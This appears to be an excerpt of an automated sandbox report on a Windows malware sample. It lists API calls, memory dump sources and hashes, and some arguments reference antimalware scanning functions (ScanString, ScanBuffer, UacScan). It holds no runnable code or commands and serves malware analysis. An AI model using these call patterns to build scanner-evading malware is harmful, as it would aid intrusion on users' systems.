                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,15CE850D,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue), ref: 15CE8598
                                                                                                                                                                                    • GetLastError.KERNEL32(?,15CE850D,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue,15CFF160,15CFF168,00000000,00000364,?,15CE82E7), ref: 15CE85A4
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,15CE850D,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue,15CFF160,15CFF168,00000000), ref: 15CE85B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: d1b18262ac000b3a3d121af144058672bebeead0f40af9a50a786a7d7f9e1a99
                                                                                                                                                                                    • Instruction ID: 47aa705f5ad1fb524d1e1f1913631165678ac9152b59a26f94566ab9a2f42af3
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1b18262ac000b3a3d121af144058672bebeead0f40af9a50a786a7d7f9e1a99
                                                                                                                                                                                    • Instruction Fuzzy Hash: 890188326176369BD7118E698CA4D877F59FF05E617210965FD05D7180DF20D902CAE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 03245C44
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,03245D30,?,?,032438BC,00000001), ref: 03245C72
                                                                                                                                                                                      • Part of subcall function 03237D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000), ref: 03237D66
                                                                                                                                                                                      • Part of subcall function 03237F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,032438BC,03245CCD,00000000,03245D30,?,?,032438BC,00000001), ref: 03237F73
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,03245D30,?,?,032438BC,00000001), ref: 03245CD7
                                                                                                                                                                                      • Part of subcall function 0323A734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0323C395,00000000,0323C3EF), ref: 0323A753
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 503785936-0
                                                                                                                                                                                    • Opcode ID: 292e29de54310bee85e70e5e24e274a2cceff507faf63075e1e9cf09a358020e
                                                                                                                                                                                    • Instruction ID: f9face9bd7d16d2a76535830d27a0a267b41a09416373ec434b5868969935ba4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 292e29de54310bee85e70e5e24e274a2cceff507faf63075e1e9cf09a358020e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7131B9B8A147049FDB00EFA5C8807EDBBF5AF4A704F908065D544AB380D7B49E45CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,03295798), ref: 0324D35C
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000510,00000000,00000000,00000001,00000000,0000001C), ref: 0324D394
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000510), ref: 0324D39F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                                    • Opcode ID: 7d2c2fedd28e8d3a64d7bd4c9d3f5f70f7595cbb7db47d9670b98c5be2e55f83
                                                                                                                                                                                    • Instruction ID: 4275ad96dc63f85461e3e28254106c6a6410cd7353df6ed813cae9ed5d749c8b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d2c2fedd28e8d3a64d7bd4c9d3f5f70f7595cbb7db47d9670b98c5be2e55f83
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7112BB5624304AFDB01FB69DC91A9D7BECEB0A610B5044A1B418DB651E674EE808B60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,03295798), ref: 0324D35C
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000510,00000000,00000000,00000001,00000000,0000001C), ref: 0324D394
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000510), ref: 0324D39F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                                    • Opcode ID: 9c2a1adb58fa6bde9f9a105621470010a3cc2a960e14843f95067ed97c0b7784
                                                                                                                                                                                    • Instruction ID: 3f9451ecfa78cc42e6acbeaedae1e46ba02ebfe59954c85f87e643dc341c5e94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2a1adb58fa6bde9f9a105621470010a3cc2a960e14843f95067ed97c0b7784
                                                                                                                                                                                    • Instruction Fuzzy Hash: 87113DB5624304EFDB01FF69DC91A9D7BECEB0A610F5044A1B418DB651D674EE808B60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 03247B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B61
                                                                                                                                                                                      • Part of subcall function 03247B20: GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B67
                                                                                                                                                                                      • Part of subcall function 03247B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B81
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2543409266-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 15CB3569
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 15CB3587
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 15CB3592
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 03234D1F
                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 03234D31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 03247396
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,15CDCE55), ref: 15CE8C24
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue,15CFF160,15CFF168,00000000,00000364,?,15CE82E7,00000000), ref: 15CE852A
                                                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 15CE8537
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2279764990-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 0323E73D
                                                                                                                                                                                      • Part of subcall function 0323E320: VariantClear.OLEAUT32(?), ref: 0323E32F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000), ref: 03246D55
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeFromProgString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4225568880-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323584A
                                                                                                                                                                                      • Part of subcall function 03235A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,03230000,0325B790), ref: 03235AAC
                                                                                                                                                                                      • Part of subcall function 03235A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 03235ACA
                                                                                                                                                                                      • Part of subcall function 03235A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235AE8
                                                                                                                                                                                      • Part of subcall function 03235A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235B06
                                                                                                                                                                                      • Part of subcall function 03235A90: RegQueryValueExA.ADVAPI32 ref: 03235B4F
                                                                                                                                                                                      • Part of subcall function 03235A90: RegQueryValueExA.ADVAPI32 ref: 03235B6D
                                                                                                                                                                                      • Part of subcall function 03235A90: RegCloseKey.ADVAPI32(?), ref: 03235B8F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03237DB0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,03251133,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,ScanString), ref: 03237E47
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • timeSetEvent.WINMM(00002710,00000000,03259B30,00000000,00000001), ref: 03259B4C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Eventtime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2982266575-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 03234C03
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2525500382-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 03234C1B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,03231A03), ref: 032315E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 032316A4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
